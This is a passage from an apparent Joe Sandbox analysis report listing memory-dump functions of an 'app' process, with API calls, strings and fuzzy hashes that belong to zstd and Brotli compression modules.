                                                                                                                                                                                                            • Associated: 00000002.00000002.3285858890.00007FF8A8086000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285876470.00007FF8A808C000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285894286.00007FF8A8090000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff8a7ff0000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Mem_$FreeSize$Arg_Err_InfoKeywords_List_MallocMemoryParseSystemTuple
                                                                                                                                                                                                            • String ID: cannot train dict: %s$nO!|IIIdIIIiIi:train_dictionary$samples must be bytes
                                                                                                                                                                                                            • API String ID: 3778040872-2048232659
                                                                                                                                                                                                            • Opcode ID: 12891563902d38278f9b4b0399898b076da4cdcf406290b7078321fd686e50ba
                                                                                                                                                                                                            • Instruction ID: 9b8708be2372c8d84d5054064f7305e4f733f6bd9e33619450112c490bd2c53c
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 12891563902d38278f9b4b0399898b076da4cdcf406290b7078321fd686e50ba
                                                                                                                                                                                                            • Instruction Fuzzy Hash: C2B13676B1AA419AEB10CF69E4806AD77F4FB88B88F000136DE0D93BA8DF78D555C714
                                                                                                                                                                                                            Function 00007FF8A7FF6EB0 Relevance: 33.4, APIs: 16, Strings: 3, Instructions: 163COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285791196.00007FF8A7FF1000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF8A7FF0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285774096.00007FF8A7FF0000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285840197.00007FF8A807C000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285858890.00007FF8A8086000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285876470.00007FF8A808C000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285894286.00007FF8A8090000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff8a7ff0000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Err_String$Arg_Keywords_ParseSizeTuple
                                                                                                                                                                                                            • String ID: cannot read negative amounts less than -1$readall$stream is closed
                                                                                                                                                                                                            • API String ID: 1444107868-4172326129
                                                                                                                                                                                                            • Opcode ID: dd24d3ebc7de638a2cf9da0ae6d3602c1deb8e5f17ece7a833c6e56df6c803d5
                                                                                                                                                                                                            • Instruction ID: 78d56bd98540af843a49d7b3e1d9cc808b56a125e91b8bf0f268ff23e0d07718
                                                                                                                                                                                                            • Opcode Fuzzy Hash: dd24d3ebc7de638a2cf9da0ae6d3602c1deb8e5f17ece7a833c6e56df6c803d5
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 38716B32A0AA46A5EF508F35D8502BC23A0FF58BD8F880536DA6D476D4DF7DD1A58324
                                                                                                                                                                                                            Function 00007FF8A8002BB0 Relevance: 31.7, APIs: 15, Strings: 3, Instructions: 170COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,?,?,00000000,00000000,00000001), ref: 00007FF8A8002C63
                                                                                                                                                                                                            • fprintf.MSPDB140-MSVCRT ref: 00007FF8A8002C79
                                                                                                                                                                                                            • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,?,?,00000000,00000000,00000001), ref: 00007FF8A8002C81
                                                                                                                                                                                                            • fflush.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,?,?,00000000,00000000,00000001), ref: 00007FF8A8002C8A
                                                                                                                                                                                                            • memmove.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,00000000,?,?,00000000,00000000,00000001), ref: 00007FF8A8002D75
                                                                                                                                                                                                            • clock.API-MS-WIN-CRT-TIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,?,?,00000000,00000000,00000001), ref: 00007FF8A8002D7F
                                                                                                                                                                                                            • clock.API-MS-WIN-CRT-TIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,?,?,00000000,00000000,00000001), ref: 00007FF8A8002D9D
                                                                                                                                                                                                            • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,?,?,00000000,00000000,00000001), ref: 00007FF8A8002DC0
                                                                                                                                                                                                            • fprintf.MSPDB140-MSVCRT ref: 00007FF8A8002DD3
                                                                                                                                                                                                            • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,?,?,00000000,00000000,00000001), ref: 00007FF8A8002DDD
                                                                                                                                                                                                            • fflush.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,?,?,00000000,00000000,00000001), ref: 00007FF8A8002DE6
                                                                                                                                                                                                            • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,?,?,00000000,00000000,00000001), ref: 00007FF8A8002E13
                                                                                                                                                                                                            • fprintf.MSPDB140-MSVCRT ref: 00007FF8A8002E2A
                                                                                                                                                                                                            • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,?,?,00000000,00000000,00000001), ref: 00007FF8A8002E34
                                                                                                                                                                                                            • fflush.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,?,?,00000000,00000000,00000001), ref: 00007FF8A8002E3D
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285791196.00007FF8A7FF1000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF8A7FF0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285774096.00007FF8A7FF0000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285840197.00007FF8A807C000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285858890.00007FF8A8086000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285876470.00007FF8A808C000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285894286.00007FF8A8090000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff8a7ff0000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: __acrt_iob_func$fflushfprintf$clock$memmove
                                                                                                                                                                                                            • String ID: %79s$%u%% $Breaking content into %u epochs of size %u
                                                                                                                                                                                                            • API String ID: 2530940919-3933756482
                                                                                                                                                                                                            • Opcode ID: 878caa9eadb41c9b08736b1a29d90086121af7dabd836da1f684dcf06a9771d1
                                                                                                                                                                                                            • Instruction ID: 8369da5525b90fad7c4792ec7f12e0ca7b901c5fdf0dbe3faef41be1e1e91bb8
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 878caa9eadb41c9b08736b1a29d90086121af7dabd836da1f684dcf06a9771d1
                                                                                                                                                                                                            • Instruction Fuzzy Hash: EF61F422B09A829AEB25CF29E4097B973A1FB99BC4F014035DE4D43B95DF3CE4558718
                                                                                                                                                                                                            Function 00007FF8A7FF6320 Relevance: 31.6, APIs: 14, Strings: 4, Instructions: 110threadCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285791196.00007FF8A7FF1000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF8A7FF0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285774096.00007FF8A7FF0000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285840197.00007FF8A807C000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285858890.00007FF8A8086000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285876470.00007FF8A808C000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285894286.00007FF8A8090000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff8a7ff0000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Err_Mem_$Eval_FreeFromLong_SizeThread$Arg_Buffer_CallDeallocFormatKeywords_MallocMemoryMethod_Object_ParseReleaseRestoreSaveSize_tSsize_tStringTuplememmove
                                                                                                                                                                                                            • String ID: stream is closed$write$y*:write$zstd decompress error: %s
                                                                                                                                                                                                            • API String ID: 2443914935-145377397
                                                                                                                                                                                                            • Opcode ID: 3db3c2b7129cc57d5d1220a0cf6f7758087bdce6448c213970c77f2f342af287
                                                                                                                                                                                                            • Instruction ID: 16f8bb12f38203593306aa0f6408b173d8c1db5b989bf5e9b60e54363bd88ca3
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3db3c2b7129cc57d5d1220a0cf6f7758087bdce6448c213970c77f2f342af287
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 55513C32A0EF82A6EE509F21E85026973B0FB85BD4F010136EA9E43BA4DF3CE555D714
                                                                                                                                                                                                            Function 00007FF8A7FF7C30 Relevance: 29.9, APIs: 12, Strings: 5, Instructions: 173threadCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285791196.00007FF8A7FF1000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF8A7FF0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285774096.00007FF8A7FF0000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285840197.00007FF8A807C000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285858890.00007FF8A8086000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285876470.00007FF8A808C000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285894286.00007FF8A8090000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff8a7ff0000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Eval_Thread$DeallocSizeString$Bytes_RestoreSave$CallErr_FromMethod_Object_
                                                                                                                                                                                                            • String ID: error ending compression stream: %s$output flushed$read$zstd compress error: %s$zstd compress error: %s
                                                                                                                                                                                                            • API String ID: 2104762964-665995045
                                                                                                                                                                                                            • Opcode ID: fe57e5972b947ed2a3672ce20f4a583392b2ff3ff5f1220c5ef9fad8a78ad2fe
                                                                                                                                                                                                            • Instruction ID: eb4bdbaa7cb4990c08a20c99299ed22d42706420e32dc388b299b996f3b760a0
                                                                                                                                                                                                            • Opcode Fuzzy Hash: fe57e5972b947ed2a3672ce20f4a583392b2ff3ff5f1220c5ef9fad8a78ad2fe
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 35813632A0AB8291EB408F71E8403AD73A0FB44BE8F844636CE5D4B7A8DF78D555D324
                                                                                                                                                                                                            Function 00007FF8A7FFBE00 Relevance: 29.9, APIs: 13, Strings: 4, Instructions: 170COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285791196.00007FF8A7FF1000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF8A7FF0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285774096.00007FF8A7FF0000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285840197.00007FF8A807C000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285858890.00007FF8A8086000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285876470.00007FF8A808C000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285894286.00007FF8A8090000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff8a7ff0000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Err_String$Arg_Keywords_ParseSizeTuple
                                                                                                                                                                                                            • String ID: cannot read negative amounts less than -1$error ending compression stream: %s$readall$stream is closed
                                                                                                                                                                                                            • API String ID: 1444107868-1440110612
                                                                                                                                                                                                            • Opcode ID: 6256aaf3a08202d869be0f7bba6de7f69cb9b72250b12326f077d05388a3bf28
                                                                                                                                                                                                            • Instruction ID: d35eb6c0b1f14d5c2b1afc0ba1bf89489b4c03e8f8268ee506a6e16f39b1ee2e
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6256aaf3a08202d869be0f7bba6de7f69cb9b72250b12326f077d05388a3bf28
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 34717F72A0AB42A2EE548F75E44026D63A0FF88BE4F444232DA6D477E4DF7CE5A5C700
                                                                                                                                                                                                            Function 00007FF8A7FFAC10 Relevance: 29.9, APIs: 14, Strings: 3, Instructions: 130threadCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285791196.00007FF8A7FF1000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF8A7FF0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285774096.00007FF8A7FF0000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285840197.00007FF8A807C000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285858890.00007FF8A8086000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285876470.00007FF8A808C000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285894286.00007FF8A8090000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff8a7ff0000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Bytes_Eval_StringThread$Arg_Buffer_Err_FromKeywords_ParseReleaseResizeRestoreSaveSizeTuplememmove
                                                                                                                                                                                                            • String ID: cannot call compress() after compressor finished$y*:compress$zstd compress error: %s
                                                                                                                                                                                                            • API String ID: 2892410281-1145966395
                                                                                                                                                                                                            • Opcode ID: 2b967b799d053b2518af38dea0560d8a962d52b06edd14c78244b35af20206d1
                                                                                                                                                                                                            • Instruction ID: d49bc4742dad6e19c7718c4d65a8c42b1cc71896b95c994ac3266a4e51da711c
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2b967b799d053b2518af38dea0560d8a962d52b06edd14c78244b35af20206d1
                                                                                                                                                                                                            • Instruction Fuzzy Hash: D2513832A0AB42A6EF208F61E8402AD23A4FB59BC4F444137CE4D57BA4DF3CE165D354
                                                                                                                                                                                                            Function 00007FF8A7FFEB50 Relevance: 28.1, APIs: 12, Strings: 4, Instructions: 139threadCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285791196.00007FF8A7FF1000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF8A7FF0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285774096.00007FF8A7FF0000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285840197.00007FF8A807C000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285858890.00007FF8A8086000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285876470.00007FF8A808C000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285894286.00007FF8A8090000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff8a7ff0000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Eval_Thread$Buffer_Err_ReleaseRestoreSaveString$Bytes_FormatFromSize
                                                                                                                                                                                                            • String ID: input should have been fully consumed before calling flush() or finish()$unhandled compression mode; this should never happen$zstd compress error: %s$zstd compress error: %s
                                                                                                                                                                                                            • API String ID: 1818849939-4274625903
                                                                                                                                                                                                            • Opcode ID: 77fc79c38fef7e11aa5a1fd047066fcd0de3f8b668ccb8c8538c116bb5433d31
                                                                                                                                                                                                            • Instruction ID: d830a8950f9ce380d70d41d4412e05ec0ca55da24dc2ac46c9565330e6d546f8
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 77fc79c38fef7e11aa5a1fd047066fcd0de3f8b668ccb8c8538c116bb5433d31
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 22515D62A0AA02A2EF208F35E48012C23A0FB59FE8F540232DE5D577DCDF78D9A5D354
                                                                                                                                                                                                            Function 00007FF8A7FF5590 Relevance: 26.5, APIs: 10, Strings: 5, Instructions: 211COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285791196.00007FF8A7FF1000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF8A7FF0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285774096.00007FF8A7FF0000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285840197.00007FF8A807C000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285858890.00007FF8A8086000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285876470.00007FF8A808C000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285894286.00007FF8A8090000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff8a7ff0000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Err_free$Eval_FormatThread$Arg_DeallocInstanceKeywords_MemoryObject_ParseRestoreSaveSizeStringTuple
                                                                                                                                                                                                            • String ID: dict_data must be zstd.ZstdCompressionDict$unable to reference prepared dictionary: %s$unable to set decoding format: %s$unable to set max window size: %s$|OnI:ZstdDecompressor
                                                                                                                                                                                                            • API String ID: 87404611-2397764948
                                                                                                                                                                                                            • Opcode ID: 5439a6f41ddf9bd6b8b91b8cc1d2fc5b2fe86ac7138b73f41ef203ec199d8947
                                                                                                                                                                                                            • Instruction ID: 1fb0902ed1235253adcc4009c6f4e75cfc466a7b16bc2ade1aac1c222f4b8ad0
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5439a6f41ddf9bd6b8b91b8cc1d2fc5b2fe86ac7138b73f41ef203ec199d8947
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 90A19876A0AB86A6EB548F25E54037D73A4FB44BD0F104135CA5E03B94DF7CE6A1D710
                                                                                                                                                                                                            Function 00007FF8A7FFBBA0 Relevance: 26.4, APIs: 11, Strings: 4, Instructions: 151COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285791196.00007FF8A7FF1000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF8A7FF0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285774096.00007FF8A7FF0000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285840197.00007FF8A807C000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285858890.00007FF8A8086000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285876470.00007FF8A808C000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285894286.00007FF8A8090000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff8a7ff0000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Bytes_SizeString$From$DeallocErr_$Arg_FormatKeywords_ParseResizeTuplememmove
                                                                                                                                                                                                            • String ID: cannot read negative amounts less than -1$error ending compression stream: %s$stream is closed$|n:read1
                                                                                                                                                                                                            • API String ID: 3984132425-1687241806
                                                                                                                                                                                                            • Opcode ID: 5ac2da0e6f19fcc14031710fe0bcc3b0a61b4be40cb715125911d920d8ac487c
                                                                                                                                                                                                            • Instruction ID: d27a0aabcf6e108db3acc23e3799e4933b287d90b2cb462fd19cfdeee1798c02
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5ac2da0e6f19fcc14031710fe0bcc3b0a61b4be40cb715125911d920d8ac487c
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 01614D62A06B02A5EF548F35D8402BC23A0FF58BE8F484636DA2D476E9EF7CD195D314
                                                                                                                                                                                                            Function 00007FF8A7FF6930 Relevance: 26.3, APIs: 13, Strings: 2, Instructions: 88COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285791196.00007FF8A7FF1000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF8A7FF0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285774096.00007FF8A7FF0000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285840197.00007FF8A807C000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285858890.00007FF8A8086000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285876470.00007FF8A808C000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285894286.00007FF8A8090000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff8a7ff0000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Dealloc$Size$CallMethod_Object_$Bytes_List_$AppendFromString
                                                                                                                                                                                                            • String ID: join$read
                                                                                                                                                                                                            • API String ID: 4080431385-2265832736
                                                                                                                                                                                                            • Opcode ID: 1b83302fc6def570fef72cb30f1d7975b58b10f36c8e9df4ef7121bf91d21fdf
                                                                                                                                                                                                            • Instruction ID: b05913db2f833b498b6cd3c7b8818ac32b9e88996ef2b15de76cd7b3d322768b
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1b83302fc6def570fef72cb30f1d7975b58b10f36c8e9df4ef7121bf91d21fdf
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4D316D21A0BB43A1EE548F62B92027823A0EF59FC4F09403ADD4E46794EF7CE6669314
                                                                                                                                                                                                            Function 00007FF8A7FFBA40 Relevance: 26.3, APIs: 13, Strings: 2, Instructions: 88COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285791196.00007FF8A7FF1000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF8A7FF0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285774096.00007FF8A7FF0000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285840197.00007FF8A807C000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285858890.00007FF8A8086000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285876470.00007FF8A808C000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285894286.00007FF8A8090000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff8a7ff0000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Dealloc$Size$CallMethod_Object_$Bytes_List_$AppendFromString
                                                                                                                                                                                                            • String ID: join$read
                                                                                                                                                                                                            • API String ID: 4080431385-2265832736
                                                                                                                                                                                                            • Opcode ID: 1932e1ce21c1101fa72580c363a2aeaa948c0b2f06cf2fe368eb083c0a5486a3
                                                                                                                                                                                                            • Instruction ID: 9c3871c0ef63656eeab604019ef0dd4e450e36ef1ed34956b6bf9efa4aa73bfc
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1932e1ce21c1101fa72580c363a2aeaa948c0b2f06cf2fe368eb083c0a5486a3
                                                                                                                                                                                                            • Instruction Fuzzy Hash: D8315A21A0BB43A1EE159F76A96427823A0EF58FC0F084031DE0E46798EF7CE5659318
                                                                                                                                                                                                            Function 00007FF8A8188A10 Relevance: 24.7, APIs: 12, Strings: 2, Instructions: 163threadCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3286045317.00007FF8A8131000.00000020.00000001.01000000.00000022.sdmp, Offset: 00007FF8A8130000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.3286027871.00007FF8A8130000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3286080256.00007FF8A818A000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3286165822.00007FF8A81FF000.00000004.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3286191545.00007FF8A8201000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3286191545.00007FF8A8205000.00000002.00000001.01000000.00000022.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff8a8130000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: _invalid_parameter_noinfo_noreturn$Eval_SizeThread$Arg_Buffer_Bytes_FromKeywords_ParseReleaseRestoreSaveStringTuplefreemalloc
                                                                                                                                                                                                            • String ID: BrotliDecompress failed$y*|:decompress
                                                                                                                                                                                                            • API String ID: 122099618-3609120798
                                                                                                                                                                                                            • Opcode ID: 114f6e887864c9452b6e749f16f8915dfecf3fe5e2a9eda231f9669842758b46
